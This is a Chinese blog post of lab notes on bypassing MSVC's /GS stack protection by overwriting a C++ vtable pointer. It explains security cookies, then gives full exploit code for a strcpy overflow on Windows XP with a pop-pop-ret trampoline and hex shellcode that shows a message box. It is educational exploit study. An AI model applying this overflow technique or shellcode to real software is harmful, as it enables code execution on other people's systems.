7.1 覆盖虚函数突破GS

最新推荐文章于 2022-10-20 23:23:14 发布
最新推荐文章于 2022-10-20 23:23:14 发布
阅读量593 收藏 1
点赞数
分类专栏: 0day安全 文章标签: 安全 c++
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/127243248
版权

目录

一、GS安全编译选项的保护原理

 1、Security Cookie

 2、变量重排

二、实验环境

三、实验代码

四、实验步骤

一、GS安全编译选项的保护原理

 1、Security Cookie

        GS编译选项为每个函数调用增加了一些额外的数据和操作,用以检测栈中的溢出:

  • 在所有函数调用发生时,向栈帧内压入一个额外的随机DWORD,这个随机数被称为“cannary”,但如果使用IDA反汇编的话,IDA会将这个随机数标注为“Security Cookie”;
  • Security Cookie位于EBP之前,系统还将在.data的内存区域存放一个Security Cookie的副本;
  • 在栈中发生溢出时,Security Cookie将会被首先淹没,之后才是EBP和返回地址;
  • 在函数返回之前,系统将执行一个额外的安全验证操作,被称为Security Check;
  • 在Security Check的过程中,系统将会比较栈中原来存放的Security Cookie和.data中副本的值,如果两者不吻合,说明栈帧中的Security Cookie已被破坏,即栈中发生了溢出。
  • 当检测到栈中发生溢出时,系统将进入异常处理流程,函数不会被正常返回,ret指令不会得到执行。

        GS保护机制下的内存布局如图所示:

         并不是对所有的调用函数都使用GS,以下情况将不会使用GS:

  • 函数不包含缓冲区;
  • 函数被定义为具有参数变量列表;
  • 函数使用无保护的关键字标记;
  • 函数在第一个语句中包含内嵌汇编代码;
  • 缓冲区不是8字节类型且大小不大于4字节。

        Security Cookie产生的细节:

  • 系统以.data节的第一个双字作为Cookie的种子,或称为原始Cookie(所有函数的Cookie都用这个DWORD生成);
  • 在程序每次运行时Cookie的种子都不同,因此种子具有很强的随机性;
  • 在栈帧初始化以后系统用ESP异或种子,作为当前函数的Cookie,以此作为不同函数之间的区别,增加了cookie的随机性;
  • 在函数返回前,用ESP还原出(异或)Cookie的种子。

 2、变量重排

        GS除了在返回地址前添加Security Cookie,在编译时根据局部变量的类型对变量在栈帧中的位置进行调整。 下图是标准栈与GS保护栈的对比:

        回顾GS机制,程序只有在函数返回时才会检查Security Cookie,那么只要我们在函数返回劫持程序,就有可能实现对程序的溢出。

二、实验环境

        操作系统:windows xp sp2

        软件版本:VS2008(GS、release)、原版OD(实时调试)

三、实验代码

#include "stdafx.h"
#include "string.h"

class GSVirtual {
public :
	void gsv(char * src)
	{
		char buf[200];
		strcpy(buf, src);
		bar(); // virtual function call
	}
	virtual void  bar()
	{
	}
};
int main()
{
	__asm int 3
	GSVirtual test;
	test.gsv(
		
		"\x25\xF9\x98\x7C"//不同的机器,地址不一样
		"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
		"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
		"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
		"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
		"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
		"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
		"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
		"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
		"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
		"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
		"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\0"

		
		
		/*
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\0"
		*/
		);
	return 0;
}

        代码解释及实验思路:

        (1)类GSVirtual中的gsv函数存在典型的溢出漏洞;

        (2)类GSVirtual中包含一个虚函数vir;

        (3)当gsv函数中的buf变量发生溢出的时候可能会影响到,如果我们可以修改虚函数表的地址,将其指向我们可以控制的内存空间,就可以在程序调用虚函数时控制程序流程。

四、实验步骤

        确保缓冲区安全检查开启,也就是在函数返回时会判断security cookie是否被修改,以此判断是否出现缓冲区溢出。

        使用如下代码判断:要想修改虚表指针的值,还需填充多少个字节的数据。

#include "stdafx.h"
#include "string.h"

class GSVirtual {
public :
	void gsv(char * src)
	{
		char buf[200];
		strcpy(buf, src);
		bar(); // virtual function call
	}
	virtual void  bar()
	{
	}
};
int main()
{
	__asm int 3
	GSVirtual test;
	test.gsv(

		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\0"

		);
	return 0;
}

       

        执行strcpy操作; 

         执行完strcpy操作,查看内存分布,可以发现:要想在strcpy没结束之前修改虚函数表的地址,还差20字节。

         将虚函数表地址修改为原始shellcode的地址,那么在程序在调用虚函数的时候,虚函数指针将会找到shellcode处。现在要做的就是让EIP寄存器指向0x00402100(内存中shellcode的起始地址)或者指向0x12FE9C(栈中shellcode的起始地址),此处需要使用跳板技术!

        程序执行到CALL指令,发现没有哪个寄存器保存有0x00402100或者0x0012FE9C的值,因此使用jmp将无法达到目的。

        发现:栈区0x0012FE8C是指向栈区的shellcode,因此我们可以使用pop.pop.return指令来使得EIP指向0x0012FE9C,从而指向shellcode。

        注:为什么要两个pop?

        因为调用call时,栈区会保存返回地址,那么0x0012FE8C将距离栈顶8字节,emm,所以需要在return(也就是EIP指向栈顶地址)时,需要pop处8字节的数据。

         如何找pop.pop.return地址呢?需要用到OllyUni.dll插件。

        之后,在日志里面找相关地址。

        这个地址需要写成第一个pop的地址,不然,你直接就是return了,EIP会指向之前CALL的返回地址。

        需要注意的是:当EIP指向0x0012FE8C时,你找的pop.pop.return的地址将会被解析成指令,这里就会出现解析出来的指令执行不了的问题,因此,如果执行不了,你得多找几次。

         上述完成后,同样使用弹框failwest作为核心shellcode。

#include "stdafx.h"
#include "string.h"

class GSVirtual {
public :
	void gsv(char * src)
	{
		char buf[200];
		strcpy(buf, src);
		bar(); // virtual function call
	}
	virtual void  bar()
	{
	}
};
int main()
{
	//__asm int 3
	GSVirtual test;
	test.gsv(
		
		"\x25\xF9\x98\x7C"//不同的机器,地址不一样
		"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
		"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
		"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
		"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
		"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
		"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
		"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
		"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
		"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
		"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
		"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\0"

		);
	return 0;
}

 

 

 

PT_silver
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MFC查看虚函数经验.txt
01-02
我建了一个MFC工程Mfcdlg cl Mfcdlg.cpp /d1 reportSingleClassLayoutCMfcdlgApp 命令运行报错,在afxv_w32....于是在环境变量include设置C:\Program Files\Microsoft SDKs\Windows\v7.1\Include 运行命令成功。
淹没虚函数地址过GS保护(关闭DEP保护)
m0_64973256的博客
08-25 227
(2)既然我们需要shellcode前四个字节指向一段程序,为什么不直接指向下面的弹窗shellcode的位置,这是因为拷贝函数判断拷贝结束是看这个字节是否=\x00,而我们栈中的地址都是\x00开头,这样会导致拷贝终止,所以我们shellcode除了最后一个字节可以为\x00,其他地方均不得出现\x00,故而我们在程序中寻找不会出现\x00的地址,指向pop,pop,ret,达到控制程序流程到我们的shellcode的目的。覆盖虚表地址的四字节,同样是我们这段字符串在栈中的首地址。...
0day 第10章--10.3:覆盖虚函数突破GS
I have a dream
11-01 435
实验环境:winxp sp3 vs2010 实验要求:程序要求禁用优化、release版本 实验原理:程序只有在函数返回时才检查Security Cookie,如果在函数检查之前劫持程序流程,就能实现缓冲区溢出了!因此可以利用C++中的虚函数!(为什么?见0day第6章攻击C++虚函数) [C++虚函数原理] {虚表指针->虚表->函数地址,call函数地址} 总结一下入的坑: (1)...
图解C++多态,虚函数虚函数表、虚指针、重写与覆盖
WYuan的博客
11-19 1908
多态         多态就是多种形态,C++的多态分为静态多态与动态多态。         静态多态就是编译器根据函数实参的类型判断出要调用哪个函数。比如函数重载和函数模板。         动态多态依靠的是虚函数表和动态绑定机制,因为是在运行时根据对象的类型在虚函数表中寻找调用函数的地址来调用相应的函数,所以称为动态多态。         本文仅
虚函数覆盖、隐藏、多态)
xiaoyu1381的博客
10-20 1149
虚函数覆盖、隐藏、多态)
C++虚函数指针虚函数
烟花易冷
07-10 5688
C++的多态可以分为静态多态和动态多态。函数重载和运算符重载实现的多态属于静态多态,而通过虚函数可以实现动态多态。实现函数的动态联编其本质核心则是虚表指针与虚函数表。   1. 虚函数与纯虚函数区别 1)虚函数在子类里面也可以不重载的;但纯虚必须在子类去实现 2)带纯虚函数的类叫虚基类也叫抽象类,这种基类不能直接生成对象,只能被继承,重写虚函数后才能使用,运行时动态动态绑定!   2.
VBA 7.1 FOR WPS 2019
10-30
3. **新函数和对象**:VBA 7.1可能包含了新的内置函数和对象,以适应不断发展的技术需求,例如可能新增了与云计算、大数据或现代API交互的相关功能。 4. **性能提升**:版本升级通常会带来性能优化,VBA 7.1也不...
RationalDMIS 7.1 三角函数计算 2020.pdf
03-25
RationalDMIS 7.1 三角函数计算 2020
最新版VBA插件7.1支持wps
最新发布
05-02
为了充分利用VBA插件7.1,用户需要具备一定的VBA编程基础,了解基本的语法结构、对象模型和函数库。同时,WPS Office可能有其特定的VBA对象和方法,需要查阅相关文档以确保代码的正确性和兼容性。此外,持续关注VBA...
Matlab matpower7.1
04-27
Matlab matpower7.1
覆盖虚函数突破GS (踩坑)
weixin_30485291的博客
03-08 273
环境: xp sp3 vs 2008 参考文章: https://bbs.pediy.com/thread-211315.htm https://www.52pojie.cn/thread-490768-1-1.html 《0day安全软件漏洞分析技术》 10.3 节 代码: #include "stdafx.h" #include "string.h" class GSVirtual { pu...
还原0day----覆盖虚函数突破GS
笔记本
05-12 444
接上一篇,与vc++6.0(并没有GS安全机制)不一样的是,vs2008启用GS后的实例内存布局有些不一样,结合0day代码探究下突破GS的具体细节 C++代码:vs2008 release 优化禁用 #include "stdafx.h" #include "string.h" class GSVirtual { public : void gsv(char * src) ...
《0Day》之通过覆盖虚表指针来突破GS
binghupo的博客
12-05 1048
对于栈溢出,微软做了GS防护,就是在函数栈帧初始化之后,生成一个随机的cookie,将其保存在EBP之前,同时在.data中也保存一份,在函数返回之前,先检测栈中cookie的值,如果我们还用之前栈溢出的方式,通过shellcode覆盖函数返回地址来达到溢出的目的,这时必然会覆盖掉栈中的cookie,这样的溢出就会被检测到,也就无法达到溢出的目的。但是正所谓你有张良计,我有过墙梯,GS的检测要在函
记录学习《0Day安全》路上遇到的问题解决方案 利用Ret2Libc挑战DEP
Z_LiT0的博客
05-03 794
if __author__ == "LiT0":0x00 前言在此节中,首次碰到书本上的错误(大神勿喷,请看完全文。按照我的思路执行成功) 具体在12.3.1节 关于利用ZwSetInformationProcess 的实践实验。实验了一晚上,按照书上一步步来总是出错。经过认真研究发现了一处错误。 系统环境与书上一致 xp sp3 && vc++ 没有gs 和 safeseh 0x01
《0day安全》——栈中的守护天使:GS
sunr_的博客
08-26 361
GS安全编译选项 原理 在栈帧中压入一个随机DWORD,IDA称之为“security cookie”,位于EBP之前。系统在.data区块中存放一个security cookie的副本。当栈发生溢出是,security cookie将被覆盖,之后才是EBP和返回地址。函数返回之前比对两者的值,如果改变则说明security cookie已被破坏,发生了溢出。 例外 额外的数据和操作带来的直接后果就是系统性能的下降,为了将对性能的影响降到最小,编译器在编译程序的时候并不是对所有的函数都应用 GS,以下情况
虚函数突破GS
weixin_30709929的博客
05-19 101
如何确定变量的内存布局 为什么不直接执行buff里面的shellcode,而要绕远 因为虚表指针指向buff,buff的地址还要指向另一个地址,没有办法直接执行buff。这是由虚函数与虚表性质决定。 为什么执行完call还必须返回shellcode,call不就是call进shellcode吗? call是必须的,见问题2.然后剩下的问题是怎么回到shellcod...
【分析】C++中通过溢出覆盖虚函数指针列表执行代码
FreeXploiT
03-30 1318
C++中通过溢出覆盖虚函数指针列表执行代码 作者:watercloud 主页:http://www.nsfocus.com 日期:2002-4-15      目录:  1.  C++虚函数的静态联编和动态联编  2.  VC中对象的空间组织和溢出试验  3.  GCC中对象的空间组织和溢出试验  4.  参考 C++虚函数的静态联编和动态联编      C++中的一大法宝就是虚函数,简
idirect3ddevice9虚函数偏移_图解利用虚函数GS保护
weixin_39677106的博客
11-20 181
前言个人感觉利用虚函数GS保护过程稍微会复杂些,因为涉及到多次跳转。为了写清楚利用虚函数GS,本文从payload构造切入,着重描写payload构建过程,从而让读者明白利用虚函数GS的细节;并且在payload构建过程,对跳转细节采用图解方式,让读者跳出代码,先理清楚整个逻辑关系,然后再载入payload,讲解整个payload运行过程。(需要说明的是文中的寻址图,仅仅为了更清楚...
虚函数绕过 GS保护 学习
weixin_30432179的博客
09-08 153
#pragma strict_gs_check(on) 强制设置 GS保护 VS2008 当缓冲区<=4字节时 不被 GS保护 设置上面的 可以强制保护 #include "stdafx.h" #include <windows.h> #pragma strict_gs_check(on) void f(char str[]) { char ...
详述RHEL 7.1安装步骤
"逐步安装Redhat企业级Linux (RHEL 7.1) v7.1" 在本文中,我们将深入探讨Red Hat Enterprise Linux (RHEL) 7.1的安装步骤,以及关于这个版本的一些关键特性。RHEL是一款从商业角度开发的Linux发行版,它免费提供源...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值